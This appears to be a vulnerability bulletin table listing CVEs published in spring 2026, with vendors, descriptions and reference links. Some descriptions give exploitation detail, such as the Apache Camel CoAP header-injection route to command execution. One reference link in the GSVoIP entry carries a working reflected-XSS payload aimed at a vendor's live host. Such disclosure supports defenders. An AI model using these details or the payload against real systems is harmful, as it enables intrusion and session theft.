| passmark[.]com-- BurnInTest v11.0 | An issue in the component DirectIo64.sys of PassMark BurnInTest v11.0 Build 1011, OSForensics v11.1 Build 1007, and PerformanceTest v11.1 Build 1004 allows attackers to access kernel memory and escalate privileges via a crafted IOCTL 0x8011E044 call. | 2026-05-01 | not yet calculated | CVE-2025-52347 | https://www.passmark.com/products/performancetest/history.php https://www.osforensics.com/whats-new.html https://www.passmark.com/products/burnintest/history.php https://github.com/netero1010/Vulnerability-Disclosure/tree/main/CVE-2025-52347 |
| n/a--Eprosima Micro-XRCE-DDS Agent v.3.0.1 | An issue in eProsima Micro-XRCE-DDS Agent v.3.0.1 allows a remote attacker to cause a denial of service via a crafted packet to the MTU length field. | 2026-05-01 | not yet calculated | CVE-2025-63547 | https://github.com/eProsima/Micro-XRCE-DDS-Agent/issues/390 https://github.com/j4kb4dw0lf/CVEs/blob/main/README.md |
| n/a--Eprosima Micro-XRCE-DDS Agent v.3.0.1 | An issue in eProsima Micro-XRCE-DDS Agent v.3.0.1 allows a remote attacker to cause a denial of service via a packet specially crafted to bear a non-valid value in any Boolean field. | 2026-05-01 | not yet calculated | CVE-2025-63548 | https://github.com/eProsima/Micro-XRCE-DDS-Agent/issues/389 https://github.com/j4kb4dw0lf/CVEs/blob/main/README.md |
| n/a--Pro-Bit | An issue in Pro-Bit before v1.77.4 allows unauthenticated attackers to directly access sensitive directory and its subdirectories. | 2026-04-27 | not yet calculated | CVE-2025-69428 | https://github.com/jasetpen/CVE-2025-69428 |
| n/a--GSVoIP web panel v2.0.90 | Cross-Site Scripting (XSS) vulnerability was discovered in the GSVoIP web panel version 2.0.90. The `msg` parameter in the `/painel/gateways.php/error` endpoint does not properly sanitize user-supplied input, allowing attackers to inject arbitrary JavaScript into the HTML response. A remote attacker can exploit this vulnerability by sending a crafted URL to a victim, leading to unauthorized script execution, session hijacking, phishing, or other client-side attacks. | 2026-05-01 | not yet calculated | CVE-2025-69606 | https://sip2.solutionsvoip.com.br/painel/gateways.php/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E https://www.solutionsvoip.com.br/ https://github.com/Razielx64/CVE-2025-69606-GSVoIP-XSS |
| getfancontrol[.]com--Fan Control App v251 | The Fan Control application V251 contains an improper privilege handling vulnerability in its Open File Dialog. The dialog processes user-supplied paths with elevated permissions, which can be exploited by a local attacker to perform actions with administrator-level privileges. | 2026-04-27 | not yet calculated | CVE-2025-69689 | https://getfancontrol.com https://github.com/Rem0o/FanControl.Releases https://github.com/Rem0o/FanControl.Releases/releases/tag/V251 https://gist.github.com/ahrixia/7c89bb3f1af6e85aeedde5ddb557a529 |
| SonicWall--SonicOS | A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions. | 2026-04-29 | not yet calculated | CVE-2026-0204 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0004 |
| SonicWall--SonicOS | A post-authentication Path Traversal vulnerability in SonicOS allows an attacker to interact with usually restricted services. | 2026-04-29 | not yet calculated | CVE-2026-0205 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0004 |
| SonicWall--SonicOS | A post-authentication Stack-based Buffer Overflow vulnerability in SonicOS allows a remote attacker to crash a firewall. | 2026-04-29 | not yet calculated | CVE-2026-0206 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0004 |
| Wolters Kluwer Polska--LEX Baza Dokumentów | LEX Baza Dokumentów is vulnerable to DOM-based XSS in the "em" cookie parameter. The application unsafely processes the parameter on the client side, allowing an attacker to execute arbitrary JavaScript in the context of the victim's browser. An attacker with the ability to set a cookie can already perform a more severe attack, so the impact and risk of exploitation are evaluated as minimal. However, the vendor considered this a vulnerability and released a security patch. This issue was fixed in version 1.3.4. | 2026-04-30 | not yet calculated | CVE-2026-1493 | https://www.wolterskluwer.com/pl-pl/solutions/lex-baza-dokumentow https://cert.pl/posts/2026/04/CVE-2025-1493 |
| Samsung Mobile--Samsung Mobile Devices | Insufficient verification of data authenticity in PackageManagerService prior to SMR Mar-2026 Release 1 allows local attackers to modify the installation restriction of specific application. | 2026-04-29 | not yet calculated | CVE-2026-21023 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=03 |
| OPPO--OPPO Wallet APP | OPPO Wallet APP contains a trusted domain validation flaw that allows attackers to bypass protected interface access restrictions, which may lead to account token hijacking and sensitive information disclosure. | 2026-04-27 | not yet calculated | CVE-2026-22077 | https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-2048652556296790016 |
| Imagination Technologies--Graphics DDK | A web page containing unusual WebGPU content, loaded into the GPU GLES render process, can trigger a write use-after-free crash in the GPU GLES user-space shared library. On certain platforms, when the process executing the graphics workload has system privileges, this could enable further exploits on the device. | 2026-05-01 | not yet calculated | CVE-2026-22165 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | A web page containing unusual WebGPU content, loaded into the GPU GLES render process, can trigger a write use-after-free crash in the GPU GLES user-space shared library. On certain platforms, when the process executing the graphics workload has system privileges, this could enable a subsequent exploit on the system. | 2026-05-01 | not yet calculated | CVE-2026-22166 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may issue improper GPU system calls to force the GPU to write to arbitrary physical memory pages. Under certain circumstances this could be used to corrupt not only data pages allocated by the GPU driver but memory pages in use by the kernel and by other drivers on the platform, altering their behaviour. The attack causes the GPU to perform write operations on restricted internal GPU buffers, with corruption of arbitrary physical memory as a second-order effect. | 2026-05-01 | not yet calculated | CVE-2026-22167 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Acronis--Acronis DeviceLock DLP | Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212. | 2026-04-29 | not yet calculated | CVE-2026-25852 | SEC-7217 |
| arc53--DocsGPT | DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0. | 2026-04-29 | not yet calculated | CVE-2026-26015 | https://github.com/arc53/DocsGPT/security/advisories/GHSA-gcrq-f296-2j74 https://github.com/arc53/DocsGPT/releases/tag/0.16.0 |
| aver[.]com-- web mgt interface v0.1.0000.65 | A Command Injection vulnerability in the web management interface in Aver PTC320UV2 0.1.0000.65 allows an unauthenticated attacker to execute arbitrary commands via a crafted web request. | 2026-05-01 | not yet calculated | CVE-2026-26461 | https://www.aver.com/Downloads/search?q=PTC320UV2 https://github.com/spaceraccoon/disclosures/blob/main/2026/CVE-2026-26461.md |
| Apache Software Foundation--Apache Camel | The ConsulRegistry in the camel-consul component (class org.apache.camel.component.consul.ConsulRegistry and its inner ConsulRegistryUtils.deserialize method) read Java-serialized values from the Consul KV store and passed them to ObjectInputStream.readObject() without configuring an ObjectInputFilter. An attacker who can write to the Consul KV store backing a Camel ConsulRegistry instance could inject a malicious serialized Java object that is deserialized the next time Camel performs a lookup against that registry, leading to arbitrary code execution in the Camel process. The issue mirrors the class of vulnerability already addressed for other Camel components in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747, and was overlooked during the original remediation of those CVEs. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.1. | 2026-04-27 | not yet calculated | CVE-2026-27172 | https://camel.apache.org/security/CVE-2026-27172.html |
| Netskope--Client | Netskope was notified about a potential gap in the Endpoint DLP Module for Netskope Client on Windows systems. The successful exploitation of the gap can potentially allow an unprivileged user to trigger an out-of-bounds read within a driver, leading to a Blue-Screen-of-Death (BSOD). Successful exploitation would require the Endpoint DLP module to be enabled in the client configuration. A successful exploit can potentially result in a denial-of-service for the local machine. | 2026-04-29 | not yet calculated | CVE-2026-2810 | https://www.netskope.com/resources/netskope-resources/netskope-security-advisory-nskpsa-2026-002 https://support.netskope.com/s/article/Netskope-Security-Advisory-NSKPSA-2026-002-Netskope-Endpoint-DLP-Driver-Security-Advisory |
| elixir-plug--plug_cowboy | Allocation of Resources Without Limits or Throttling vulnerability in elixir-plug plug_cowboy allows unauthenticated remote denial of service via atom table exhaustion. Plug.Cowboy.Conn.conn/1 in lib/plug/cowboy/conn.ex calls String.to_atom/1 on the value returned by :cowboy_req.scheme/1. For HTTP/2 connections, cowlib passes the client-supplied :scheme pseudo-header value through verbatim without validation. Each unique value permanently allocates a new entry in the BEAM atom table. Since atoms are never garbage-collected and the atom table has a fixed limit (default 1,048,576), an unauthenticated attacker can exhaust the table by sending HTTP/2 requests with unique :scheme values, causing the Erlang VM to abort with system_limit and taking down the entire node. This vulnerability does not affect HTTP/1.1, where cowboy derives the scheme from the listener type rather than from a client-supplied header. This issue affects plug_cowboy: from 2.0.0 before 2.8.1. | 2026-04-27 | not yet calculated | CVE-2026-32688 | https://github.com/elixir-plug/plug_cowboy/security/advisories/GHSA-q8x4-x7mp-5vg2 https://cna.erlef.org/cves/CVE-2026-32688.html https://osv.dev/vulnerability/EEF-CVE-2026-32688 https://github.com/elixir-plug/plug_cowboy/commit/bfb34cb45eb354e56437f7023fb306de1bf9c19b |
| CRM Sistemas de Fidelización--MegaCMS | SQL injection (SQLi) in MegaCMS v12.0.0, specifically in the "id_territorio" parameter of the "/web_comunications/cms/get_provincias" endpoint. The vulnerability arises from inadequate validation and sanitisation of user input. Specifically, via a POST request, the "id_territorio" parameter, used immediately after the registration form is submitted, could be manipulated by an unauthenticated attacker to execute arbitrary SQL queries. | 2026-04-29 | not yet calculated | CVE-2026-3325 | https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-megacms-crm-sistemas-de-fidelizacion |
| Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--LogonTracer | An OS command Injection issue exists in LogonTracer prior to v2.0.0. An arbitrary OS command may be executed by a logged-in user. | 2026-04-27 | not yet calculated | CVE-2026-33277 | https://www.jpcert.or.jp/press/2026/PR20260423.html https://jvn.jp/en/jp/JVN57877356/ |
| Absolute Software--Secure Access | CVE-2026-33446 is a buffer overflow in the authentication sub-system of the Secure Access client prior to 14.50. Attackers with control of a modified server can send a special packet that can overwrite a small portion of memory conceivably leading to memory corruption or a denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33446 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33446 |
| Absolute Software--Secure Access | CVE-2026-33447 is a buffer overflow in a message parsing function of the Secure Access client prior to 14.50. Attackers with control of a modified server can send a special packet that can overwrite a small portion of memory conceivably leading to memory corruption or denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33447 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33447 |
| Absolute Software--Secure Access | CVE-2026-33448 is a format string vulnerability in the logging subsystem of Secure Access client for MacOS prior to 14.50. Attackers with control of a modified server can force the client to dump the contents of a small portion of memory to the log files potentially revealing secrets. | 2026-04-30 | not yet calculated | CVE-2026-33448 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33448 |
| Absolute Software--Secure Access | CVE-2026-33449 is a buffer overflow in a message handling function of the Secure Access client prior to 14.50. Attackers with control of a modified server can send a cryptographically valid message to the client, overwriting a small portion of memory conceivably leading to a denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33449 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33449 |
| Absolute Software--Secure Access | CVE-2026-33450 is an out of bounds read vulnerability in the Secure Access MacOS client prior to 14.50. Attackers with control of a modified server can send a malformed packet to the client causing a denial of service. | 2026-04-30 | not yet calculated | CVE-2026-33450 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33450 |
| Absolute Software--Secure Access | CVE-2026-33451 is an arbitrary read/write vulnerability in the Secure Access Windows client prior to 14.50. Attackers with local control of the Windows client can send malformed data to an API and elevate their level of privilege to system. | 2026-04-30 | not yet calculated | CVE-2026-33451 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33451 |
| Absolute Software--Secure Access | CVE-2026-33452 is a buffer overflow vulnerability in the Secure Access Windows client prior to 14.50. Attackers with local control of the Windows client can use it to 'blue screen' the system. | 2026-04-30 | not yet calculated | CVE-2026-33452 | https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2026-33452 |
| Apache Software Foundation--Apache Camel | Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component. Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code execution when routes forward CoAP requests to header-sensitive producers (e.g. camel-exec). The camel-coap component maps incoming CoAP request URI query parameters directly into Camel Exchange In message headers without applying any HeaderFilterStrategy. Specifically, CamelCoapResource.handleRequest() iterates over OptionSet.getUriQuery() and calls camelExchange.getIn().setHeader(...) for every query parameter. CoAPEndpoint extends DefaultEndpoint rather than DefaultHeaderFilterStrategyEndpoint, and CoAPComponent does not implement HeaderFilterStrategyComponent; the component contains no references to HeaderFilterStrategy at all. As a result, an unauthenticated attacker who can send a single CoAP UDP packet to a Camel route consuming from coap:// can inject arbitrary Camel internal headers (those prefixed with Camel*) into the Exchange. When the route delivers the message to a header-sensitive producer such as camel-exec, camel-sql, camel-bean, camel-file, or template components (camel-freemarker, camel-velocity), the injected headers can alter the producer's behavior. In the case of camel-exec, the CamelExecCommandExecutable and CamelExecCommandArgs headers override the executable and arguments configured on the endpoint, resulting in arbitrary OS command execution under the privileges of the Camel process. The producer's output is written back to the Exchange body and returned in the CoAP response payload by CamelCoapResource, giving the attacker an interactive RCE channel without any need for out-of-band exfiltration. Exploitation prerequisites are minimal: a single unauthenticated UDP datagram to the CoAP port (default 5683). CoAP (RFC 7252) has no built-in authentication, and DTLS is optional and disabled by default. Because the protocol is UDP-based, HTTP-layer WAF/IDS controls do not apply. This issue affects Apache Camel: from 4.14.0 through 4.14.5, from 4.18.0 before 4.18.1, 4.19.0. Users are recommended to upgrade to version 4.18.1 or 4.19.0, fixing the issue. | 2026-04-27 | not yet calculated | CVE-2026-33453 | https://camel.apache.org/security/CVE-2026-33453.html |
| Apache Software Foundation--Apache Camel | The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from("imap://...") or from("pop3://...")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. | 2026-04-27 | not yet calculated | CVE-2026-33454 | https://camel.apache.org/security/CVE-2026-33454.html |
| Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--LogonTracer | There is a cypher injection issue in LogonTracer prior to v2.0.0. If specially crafted Windows event log data is loaded, the contents of the database may be altered. | 2026-04-27 | not yet calculated | CVE-2026-33566 | https://www.jpcert.or.jp/press/2026/PR20260423.html https://jvn.jp/en/jp/JVN57877356/ |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Prior to versions 2.11.43, 3.6.14, and 3.7.0-rc.2, there is an authentication bypass vulnerability in Traefik's ForwardAuth middleware when trustForwardHeader=false is configured and Traefik is deployed behind a trusted upstream proxy. This issue has been patched in versions 2.11.43, 3.6.14, and 3.7.0-rc.2. | 2026-04-30 | not yet calculated | CVE-2026-35051 | https://github.com/traefik/traefik/security/advisories/GHSA-6384-m2mw-rf54 https://github.com/traefik/traefik/releases/tag/v2.11.43 https://github.com/traefik/traefik/releases/tag/v3.6.14 https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2 |
| FreeBSD--FreeBSD | When processing the header of an incoming message, libnv failed to properly validate the message size. The lack of validation allows a malicious program to write outside the bounds of a heap allocation. This can trigger a crash or system panic, and it may be possible for an unprivileged user to exploit the bug to elevate their privileges. | 2026-04-30 | not yet calculated | CVE-2026-35547 | https://security.freebsd.org/advisories/FreeBSD-SA-26:17.libnv.asc |
| merkurysmart[.]com-- MIPC252W v1.0.5 | A handling issue in the RTSP service of the Mercury MIPC252W 1.0.5 Build 230306 Rel.79931n allows an authenticated attacker to trigger session termination by repeatedly sending SETUP requests for the same media track within a single RTSP session. This causes the server to reset the RTSP connection, leading to a denial-of-service condition. | 2026-04-27 | not yet calculated | CVE-2026-35901 | https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_2th/README.md |
| merkurysmart[.]com-- MIPC252W v1.0.5 | The RTSP service of MERCURY IP camera MIPC252W 1.0.5 Build 230306 has an issue handling failed Digest authentication attempts. By repeatedly sending RTSP requests with invalid authentication parameters, an unauthenticated attacker can cause the RTSP service to enter a persistent authentication failure state, preventing legitimate clients from authenticating and leading to a denial of service. | 2026-04-27 | not yet calculated | CVE-2026-35902 | https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_3th/README.md |
| merkurysmart[.]com-- MIPC252W v1.0.5 | MERCURY MIPC252W IP camera 1.0.5 Build 230306 Rel.79931n contains an improper authentication vulnerability in the RTSP service. After successful Digest authentication in an initial DESCRIBE request, the device does not verify the Digest response parameter in subsequent RTSP requests within the same session. As a result, RTSP methods such as SETUP, PLAY, and TEARDOWN can be processed even when the Authorization header contains an empty or invalid response value, as long as the nonce and session identifier correspond to a previously authenticated session. This allows an attacker with network access to reuse session parameters and issue unauthorized RTSP control commands without computing a valid Digest response. | 2026-04-27 | not yet calculated | CVE-2026-35903 | https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_4th/README.md |
| n/a--Krayin CRM v.2.1.5 | An issue in Krayin CRM v2.1.5 (fixed in v2.1.6) allows a remote attacker to execute arbitrary code via the compose email function. | 2026-04-30 | not yet calculated | CVE-2026-36340 | https://drive.google.com/file/d/1yBdvbrXGf9fsFckmK9zTe2v8_vDtdicH/view https://github.com/krayin/laravel-crm/releases/tag/v2.1.6 https://github.com/cybercrewinc/CVE-2026-36340 |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /plugins/-/install-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36756 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf2/readme.md |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /plugins/{name}/upgrade-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36757 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf1/readme.md |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /themes/-/install-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36758 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf3/readme.md |
| n/a--halo v2.22.14 | A Server-Side Request Forgery (SSRF) in the /themes/{name}/upgrade-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36759 | https://github.com/halo-dev/halo https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf4/readme.md |
| n/a--JeeSite v5.15.1 | An issue in the fileMd5 parameter in the /a/file/upload endpoint of JeeSite v5.15.1 allows authenticated attackers with file upload permissions to execute a path traversal and write arbitrary files with whitelisted suffixes to arbitrary filesystem locations while chunked upload is enabled. | 2026-04-30 | not yet calculated | CVE-2026-36760 | https://github.com/thinkgem/jeesite https://github.com/thinkgem/jeesite/issues/530 |
| n/a--JeeSite v5.15.1 | A stored cross-site scripting (XSS) vulnerability in the /msg/msgInner/save endpoint of JeeSite v5.15.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted input into the msgContent parameter. | 2026-04-30 | not yet calculated | CVE-2026-36761 | https://github.com/thinkgem/jeesite https://github.com/thinkgem/jeesite/issues/528 |
| n/a--JeeSite v5.15.1 | An issue in the fileEntityId parameter in the /a/file/upload endpoint of JeeSite v5.15.1 allows authenticated attackers with file upload permissions to execute a path traversal and write arbitrary files with whitelisted suffixes to arbitrary filesystem locations. | 2026-04-30 | not yet calculated | CVE-2026-36762 | https://github.com/thinkgem/jeesite https://github.com/thinkgem/jeesite/issues/529 |
| n/a--SpringBlade v4.8.0 | A stored cross-site scripting (XSS) vulnerability in the /api/blade-desk/notice/submit endpoint of SpringBlade v4.8.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted input into the content parameter. | 2026-04-30 | not yet calculated | CVE-2026-36763 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/38 https://github.com/shopizer-ecommerce/shopizer/issues/1091 |
| n/a--SpringBlade v4.8.0 | A Server-Side Request Forgery (SSRF) in the /ureport/datasource/testConnection endpoint of SpringBlade v4.8.0 allows authenticated attackers to scan internal resources via a crafted GET request. | 2026-04-30 | not yet calculated | CVE-2026-36764 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/36 |
| n/a--SpringBlade v4.8.0 | An XML external entity (XXE) vulnerability in the /designer/loadReport endpoint of SpringBlade v4.8.0 allows authenticated attackers to execute arbitrary code via injecting a crafted payload. | 2026-04-30 | not yet calculated | CVE-2026-36765 | https://github.com/chillzhuang/SpringBlade https://github.com/chillzhuang/SpringBlade/issues/37 |
| n/a--shopizer v3.2.5 | Multiple authenticated cross-site scripting (XSS) vulnerabilities in the XssHttpServletRequestWrapper class of shopizer v3.2.5 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected through the getInputStream() or getReader() functions. | 2026-04-30 | not yet calculated | CVE-2026-36766 | https://github.com/shopizer-ecommerce/shopizer https://github.com/shopizer-ecommerce/shopizer/issues/1093 |
| n/a--shopizer v3.2.5 | A path traversal vulnerability in the /content/images/add endpoint of shopizer v3.2.5 allows attackers to write arbitrary files to any writable path via a crafted POST request. | 2026-04-30 | not yet calculated | CVE-2026-36767 | https://github.com/shopizer-ecommerce/shopizer https://github.com/shopizer-ecommerce/shopizer/issues/1091 |
| Totolink[.]net -- TOTOLINK A3002RU v3 | TOTOLINK A3002RU V3 <= V3.0.0-B20220304.1804 was discovered to contain a stack-based buffer overflow via the hostname parameter in the formMapDelDevice function. | 2026-04-29 | not yet calculated | CVE-2026-36837 | https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RUV3.0-boa-formMapDelDevice-StackOverflow |
| Totolink[.]net -- TOTOLINK N200RE v5 | TOTOLINK N200RE V5 was discovered to contain a command injection vulnerability via the macstr and bandstr parameters in the formMapDelDevice function. | 2026-04-29 | not yet calculated | CVE-2026-36841 | https://github.com/0xmania/cve/tree/main/TOTOLINK-N200RE_V5-cstecgi-formMapDelDevice-CommandInjection |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the Dbit N300 T1 Pro wireless router V1.0.0. The router fails to implement proper CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints such as /api/setWlan. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action. | 2026-04-30 | not yet calculated | CVE-2026-36956 | http://dbit.com https://github.com/kirubel-cve/CVE-2026-36956 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | Dbit N300 T1 Pro Easy Setup Wireless Wi-Fi Router V1.0.0 is vulnerable to Denial of Service via the boa web server URI handler. By initiating a high-volume flood of HTTP GET requests to non-existent URIs, an attacker can exhaust critical system resources, including file descriptors and memory buffers. This results in a kernel deadlock or system hang that disables the web management portal and all routing capabilities. | 2026-04-30 | not yet calculated | CVE-2026-36957 | http://dbit.com https://github.com/kirubel-cve/CVE-2026-36957 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | A denial-of-service vulnerability exists in the U-SPEED N300 V1.0.0 wireless router. By sending a large number of concurrent HTTP requests to random or non-existent endpoints on the web management interface, an attacker can exhaust system resources in the embedded Boa HTTP server. This causes the router web interface to become unresponsive and may require manual reboot to restore normal operation. | 2026-04-30 | not yet calculated | CVE-2026-36958 | http://u-speed.com https://github.com/kirubel-cve/CVE-2026-36958 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | U-SPEED N300 router V1.0.0 does not implement rate limiting or account lockout protections on the /api/login endpoint. This allows an attacker on the local network to perform unlimited authentication attempts, enabling brute-force attacks against the administrator account and potential unauthorized access to the router management interface. | 2026-04-30 | not yet calculated | CVE-2026-36959 | http://u-speed.com https://github.com/kirubel-cve/CVE-2026-36959 |
| Dbitnet[.]com -- Dbit N300 router v.1.0 | A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the U-SPEED N300 Router V1.0.0. The device does not implement CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action. | 2026-04-30 | not yet calculated | CVE-2026-36960 | http://u-speed.com https://github.com/kirubel-cve/CVE-2026-36960 |
| n/a--FlowSpec operator array | An off-by-one out-of-bounds write vulnerability in the bgp_flowspec_op_decode() function (bgpd/bgp_flowspec_util.c) of FRRouting (FRR) stable/10.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted FlowSpec component. | 2026-05-01 | not yet calculated | CVE-2026-37457 | https://github.com/FRRouting/frr/commit/0e6882bc72c0278988a47b2f0f73b7a91099a25c |
| n/a--Automotive Grade Linux (AGL) | AGL agl-service-can-low-level through 17.1.12 contains a stack buffer overflow in the uds-c library. The send_diagnostic_request function in uds.c allocates a 6-byte stack buffer (MAX_DIAGNOSTIC_PAYLOAD_SIZE=6) but copies up to 7 bytes (MAX_UDS_REQUEST_PAYLOAD_LENGTH=7) via memcpy at an offset of 1+pid_length (2-3 bytes), resulting in 1-4 bytes of controlled stack overflow. The payload_length field (uint8_t) has no bounds check against the destination buffer. On 32-bit ARM automotive ECUs without stack canaries, this can lead to return address overwrite and RCE. | 2026-05-01 | not yet calculated | CVE-2026-37530 | https://gerrit.automotivelinux.org/gerrit/apps/agl-service-can-low-level https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a--Automotive Open SAE J1939 protocol (CAN-Bus) | Integer underflow vulnerability in Open-SAE-J1939 through commit b6caf884df46435e539b1ecbf92b6c29b345bdfe (2025-11-30) in SAE_J1939_Read_Transport_Protocol_Data_Transfer allows attackers to write to arbitrary memory via a crafted sequence number in the CAN frame. | 2026-05-01 | not yet calculated | CVE-2026-37534 | https://github.com/DanielMartensson/Open-SAE-J1939 https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--socketcand 0.4.2 | Buffer overflow vulnerability in socketcand 0.4.2 in file socketcand.c in function main allows attackers to cause a denial of service or other unspecified impacts via crafted bus_name. | 2026-05-01 | not yet calculated | CVE-2026-37538 | https://github.com/dschanoeh/socketcand https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| n/a--libsndfile 1.2.2 | An issue was discovered in libsndfile 1.2.2 IMA ADPCM codec. The AIFF code path (line 241) was fixed with (sf_count_t) cast, but the WAV code path (line 235) and close path (line 167) were not. When samplesperblock (int) * blocks (int) exceeds INT_MAX, the 32-bit multiplication overflows before being assigned to sf.frames (sf_count_t/int64). With samplesperblock=50000 and blocks=50000, the product 2500000000 overflows to -1794967296. This causes incorrect frame count leading to heap buffer overflow or denial of service. Both values come from the WAV file header and are attacker-controlled. This issue was discovered after an incomplete fix for CVE-2022-33065. | 2026-04-29 | not yet calculated | CVE-2026-37555 | https://github.com/libsndfile/libsndfile/issues/833 https://github.com/libsndfile/libsndfile/commit/9a829113c88a51e57c1e46473e90609e4b7df151 https://gist.github.com/sgInnora/a5f5c19e4bf6f4fb74fab7b0ef2bfcc1 |
| n/a--School Management System | A reflected Cross-Site Scripting (XSS) vulnerability in School Management System by mahmoudai1 allows unauthenticated remote attackers to execute arbitrary JavaScript in victims' browsers via the unsanitized type parameter in register.php. | 2026-04-28 | not yet calculated | CVE-2026-37750 | https://github.com/mahmoudai1/school-management-system https://github.com/mahmoudai1/school-management-system/blob/main/register.php https://github.com/menevarad007/CVE-2026-37750 |
